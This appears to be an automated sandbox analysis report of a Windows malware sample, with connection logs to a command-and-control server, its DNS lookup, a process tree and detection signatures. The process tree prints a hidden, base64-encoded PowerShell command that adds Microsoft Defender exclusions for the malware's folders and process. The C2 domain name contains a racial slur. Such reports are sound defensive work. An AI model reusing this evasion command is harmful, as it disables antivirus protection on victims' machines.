                                                                    Dec 13, 2024 13:28:21.033157110 CET3012049738103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:21.033271074 CET4973830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:21.034058094 CET4973830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:21.153752089 CET3012049738103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:21.153862953 CET4973830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:21.273976088 CET3012049738103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:22.637830973 CET3012049738103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:22.637904882 CET4973830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:22.638072014 CET4973830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:22.740386009 CET4973930120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:22.837946892 CET3012049738103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:22.957710028 CET3012049739103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:22.957820892 CET4973930120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:22.958693027 CET4973930120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:23.078564882 CET3012049739103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:23.078644037 CET4973930120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:23.198465109 CET3012049739103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:24.572778940 CET3012049739103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:24.572863102 CET4973930120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:24.573137045 CET4973930120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:24.678175926 CET4974030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:24.692805052 CET3012049739103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:24.797893047 CET3012049740103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:24.798007011 CET4974030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:24.901011944 CET4974030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:25.022232056 CET3012049740103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:25.022317886 CET4974030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:25.143692017 CET3012049740103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:26.397594929 CET3012049740103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:26.397732973 CET4974030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:26.397970915 CET4974030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:26.506048918 CET4974130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:26.517649889 CET3012049740103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:26.626209974 CET3012049741103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:26.626439095 CET4974130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:26.627221107 CET4974130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:26.746906996 CET3012049741103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:26.747186899 CET4974130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:26.866890907 CET3012049741103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:11.426151037 CET3012049839103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:11.532033920 CET3012049845103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:11.532115936 CET4984530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:11.532998085 CET4984530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:11.652734041 CET3012049845103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:11.652857065 CET4984530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:11.773077011 CET3012049845103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:11.880752087 CET4984530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:12.000868082 CET3012049845103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:12.000942945 CET4984530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:12.120876074 CET3012049845103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:13.240930080 CET3012049845103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:13.240982056 CET4984530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:13.241156101 CET4984530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:13.350095987 CET4985130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:13.360882044 CET3012049845103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:13.469944954 CET3012049851103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:13.470055103 CET4985130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:13.470835924 CET4985130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:13.591029882 CET3012049851103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:13.591094971 CET4985130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:13.710802078 CET3012049851103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:13.896589994 CET4985130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:14.017509937 CET3012049851103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:14.021132946 CET4985130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:14.140996933 CET3012049851103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:15.084727049 CET3012049851103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:15.084793091 CET4985130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:15.084988117 CET4985130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:15.193422079 CET4985230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:15.205197096 CET3012049851103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:15.313308954 CET3012049852103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:15.313402891 CET4985230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:15.314424038 CET4985230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:15.434179068 CET3012049852103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:15.434266090 CET4985230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:15.553988934 CET3012049852103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:16.919832945 CET3012049852103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:16.919883013 CET4985230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:16.920051098 CET4985230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:17.037347078 CET4985830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:17.039921999 CET3012049852103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:17.157171011 CET3012049858103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:17.157254934 CET4985830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:17.158122063 CET4985830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:17.278280020 CET3012049858103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:17.278356075 CET4985830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:17.398196936 CET3012049858103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:17.428884029 CET4985830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:17.548640013 CET3012049858103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:17.548800945 CET4985830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:17.668548107 CET3012049858103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:18.912172079 CET4985830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:19.032121897 CET3012049858103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:19.032233000 CET4985830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:19.148462057 CET3012049858103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:19.148530006 CET4985830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:19.151948929 CET3012049858103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:19.152437925 CET4985830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:19.268301964 CET3012049858103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:19.272190094 CET3012049858103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:19.285053015 CET4986430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:19.405313969 CET3012049864103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:19.406272888 CET4986430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:19.414136887 CET4986430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:19.533869982 CET3012049864103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:19.534883976 CET4986430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:19.654675007 CET3012049864103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:19.654807091 CET4986430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:19.774660110 CET3012049864103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:21.030495882 CET3012049864103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:21.030569077 CET4986430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:21.030745029 CET4986430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:21.146574974 CET4987030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:21.151473999 CET3012049864103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:21.266345024 CET3012049870103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:21.266472101 CET4987030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:21.267318010 CET4987030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:21.387063980 CET3012049870103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:21.387214899 CET4987030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:21.507369041 CET3012049870103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:22.872200012 CET3012049870103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:22.872262955 CET4987030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:22.872457027 CET4987030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:22.990641117 CET4987630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:22.992435932 CET3012049870103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:23.110672951 CET3012049876103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:23.110774040 CET4987630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:23.113183975 CET4987630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:23.232911110 CET3012049876103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:23.232973099 CET4987630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:23.353107929 CET3012049876103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:24.724663019 CET3012049876103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:24.724792957 CET4987630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:26.872381926 CET4987630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:26.992280006 CET3012049876103.230.121.81192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 13:27:27.717576027 CET | 58215 | 53 | 192.168.2.9 | 1.1.1.1
Dec 13, 2024 13:27:27.855551004 CET | 53 | 58215 | 1.1.1.1 | 192.168.2.9

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 13, 2024 13:27:27.717576027 CET | 192.168.2.9 | 1.1.1.1 | 0x177d | Standard query (0) | iam.nigga.dad | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 13, 2024 13:27:27.855551004 CET | 1.1.1.1 | 192.168.2.9 | 0x177d | No error (0) | iam.nigga.dad | | 103.230.121.81 | A (IP address) | IN (0x0001) | false

                                                                    Target ID:0
                                                                    Start time:07:27:18
                                                                    Start date:13/12/2024
                                                                    Path:C:\Users\user\Desktop\test.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\test.exe"
                                                                    Imagebase:0xba0000
                                                                    File size:604'672 bytes
                                                                    MD5 hash:59EAB4D3E8B7C383D6E963256CE603D8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1508460985.0000000004252000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1512992547.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1505562731.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:07:27:23
                                                                    Start date:13/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                                                                    Imagebase:0x7ff760310000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:07:27:23
                                                                    Start date:13/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:07:27:23
                                                                    Start date:13/12/2024
                                                                    Path:C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                                                                    Imagebase:0xd70000
                                                                    File size:604'672 bytes
                                                                    MD5 hash:59EAB4D3E8B7C383D6E963256CE603D8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.1555656031.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:07:27:25
                                                                    Start date:13/12/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Imagebase:0x770000
                                                                    File size:42'064 bytes
                                                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2739969270.0000000003C96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2722239626.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:6
                                                                    Start time:07:27:25
                                                                    Start date:13/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                                                                    Imagebase:0x7ff760310000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:07:27:25
                                                                    Start date:13/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:07:27:29
                                                                    Start date:13/12/2024
                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                    Imagebase:0x7ff72d8c0000
                                                                    File size:496'640 bytes
                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:12
                                                                    Start time:07:28:01
                                                                    Start date:13/12/2024
                                                                    Path:C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                                                                    Imagebase:0x6e0000
                                                                    File size:604'672 bytes
                                                                    MD5 hash:59EAB4D3E8B7C383D6E963256CE603D8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.2234027771.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.2217363905.000000000291D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true


                                                                      Execution Graph

                                                                      Execution Coverage:7.9%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:35%
                                                                      Total number of Nodes:40
                                                                      Total number of Limit Nodes:2

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 28781f5792e72082eabef89a340d9184c1091c8157a0fcf24344074ae3e8a76d
                                                                      • Instruction ID: c65c90b927985160b96f7cf681f2701def312396e72a219573c27688d98e6f4d
                                                                      • Opcode Fuzzy Hash: 28781f5792e72082eabef89a340d9184c1091c8157a0fcf24344074ae3e8a76d
                                                                      • Instruction Fuzzy Hash: 4251AF38A04105CFDB24CF64DD48BAA77B3FB88315F204079DA02AB796DB789D81EB55

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 057F283C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: a0b6691a3aa8f3aef2ebfd74212c04af5862af513351dad2b98f2161b2036aa2
                                                                      • Instruction ID: a37c2cb7289d408d5b61bb89159eab7b943fdbf82fe7d97d3c35ab3fc32bddc9
                                                                      • Opcode Fuzzy Hash: a0b6691a3aa8f3aef2ebfd74212c04af5862af513351dad2b98f2161b2036aa2
                                                                      • Instruction Fuzzy Hash: CD516C39B401108FDB44DF78E899FAA33E2EB8C252B460179D54ADB352DE389D81CB94

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 057F283C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: f3cfbd44dd1ef18647fa90b70f7ffe160b5e5bf586a2e83baf9788d2c1bb9504
                                                                      • Instruction ID: 25d28999418f37c5c44ec77d62fd604b088f0ca02295b0d2ce8cbca1f06f319d
                                                                      • Opcode Fuzzy Hash: f3cfbd44dd1ef18647fa90b70f7ffe160b5e5bf586a2e83baf9788d2c1bb9504
                                                                      • Instruction Fuzzy Hash: 12514C39B401108FDB44DF78E898FAB33E2EB8C252B460079D54ADB356DE789D81CB95

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \Vwn
                                                                      • API String ID: 0-47881834
                                                                      • Opcode ID: 5da95666a7fbf1a551fe1c727c836d36134f469b0a32bc7717e515c51b5aea50
                                                                      • Instruction ID: 6575b05571c4516c792bf030e508b10080ee33f934e502b6b2f7b48f99b95d8f
                                                                      • Opcode Fuzzy Hash: 5da95666a7fbf1a551fe1c727c836d36134f469b0a32bc7717e515c51b5aea50
                                                                      • Instruction Fuzzy Hash: B4916C70E00209DFDF10CFA8D984BAEBBF2BF88314F148129E509A7354EB759885DB81

                                                                      • Instruction ID: a1923c180060a56ef1275038eb69fb3dff4d1607837cfed93bd1f9128e950960
                                                                      • Opcode Fuzzy Hash: b9e602c6e99b8fb119d225e6cb36a79a092a1615e2ce4afdc0cdf2c28cc5a379
                                                                      • Instruction Fuzzy Hash: 5C910334B00204CFEB18DF79D458BAA7BB3BB88305F248468E6069B395DB359C85DB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f55e6591dd7c37c559802dacd4190f8d61b05dccd67e724e05d67ba22b407bc
                                                                      • Instruction ID: 10983fff16181ed4b829ff3f187f58541235326685691eb49951d53e059e5a66
                                                                      • Opcode Fuzzy Hash: 8f55e6591dd7c37c559802dacd4190f8d61b05dccd67e724e05d67ba22b407bc
                                                                      • Instruction Fuzzy Hash: 87912730A04209CBEB14CF59D444BEABBBBFB84315F188065D501AB755DBB8AEC1CB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: de4f3716470367bfa3776af7224ad14fd238bf77f7744f8001d77d4fb79b8cd7
                                                                      • Instruction ID: b1df796291d18710959f804d4f73d62e71a69a73367c5627f4e8727e2f73acb1
                                                                      • Opcode Fuzzy Hash: de4f3716470367bfa3776af7224ad14fd238bf77f7744f8001d77d4fb79b8cd7
                                                                      • Instruction Fuzzy Hash: 17919D30A04100DFEB18CF69D948FAA77E3FB88305F558078D206AB755DB789E81EB94
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df08548aaa183c87fc602f615f66c942deb998851e0dc64fd2179c712593310a
                                                                      • Instruction ID: 75296e84253080d10c6a65ae1044a1f81a22bc4637612c2feddfde9bd2448a6d
                                                                      • Opcode Fuzzy Hash: df08548aaa183c87fc602f615f66c942deb998851e0dc64fd2179c712593310a
                                                                      • Instruction Fuzzy Hash: C9918E30A04104DFEB18CF69D948FAA73E3FB88305F558078D206AB755DB789E81EB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 357e75f5d25546d3fdf70ff80615a2e51546fbde4ab64fe9a9134cc201492bc3
                                                                      • Instruction ID: 8f28709ca120578ba6d7745d2a30ef5792a6b214003efdfce1fccb69e2691a44
                                                                      • Opcode Fuzzy Hash: 357e75f5d25546d3fdf70ff80615a2e51546fbde4ab64fe9a9134cc201492bc3
                                                                      • Instruction Fuzzy Hash: 79912430A04209CBEB14CF59D444BEABBABBB84315F188065D501AB795CBB89EC2CB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1505397932.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
